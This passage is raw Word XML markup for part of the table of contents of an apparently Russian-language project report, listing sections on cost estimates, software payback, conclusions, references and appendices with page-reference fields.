              <w:t>4.5</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчет затрат на основные материалы</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505570 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</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71" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Заработная плата исполнителей</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505571 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</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72" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.1</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчет накладных расходов</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505572 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</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73" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.2</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчёт стоимости машинного времени</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505573 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="33"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505574" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6.3</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Общая смета затрат на разработку проекта</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505574 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</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75" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Расчет окупаемости программного обеспечения</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505575 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>69</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00007DA5" w:rsidRDefault="00F870DF">
          <w:pPr>
            <w:pStyle w:val="23"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="ru-RU"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc61505576" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Выводы четвертого раздела</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505576 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>70</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77" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ЗАКЛЮЧЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505577 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</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78" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Н</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ИКОВ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505578 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</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79" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ А</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505579 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</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0" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Б</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505580 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</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1" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ В</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505581 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</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2" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Г</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505582 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</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3" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Д</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505583 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</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4" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Е</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505584 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>89</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5" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Ж</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505585 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</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6" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ И</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505586 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</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7" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ К</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505587 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>94</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8" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ Л</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc61505588 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</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89" w:history="1">
            <w:r w:rsidR="00007DA5" w:rsidRPr="00567B5A">
              <w:rPr>
                <w:rStyle w:val="ae"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ПРИЛОЖЕНИЕ М</w:t>
            </w:r>
            <w:r w:rsidR="00007DA5">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
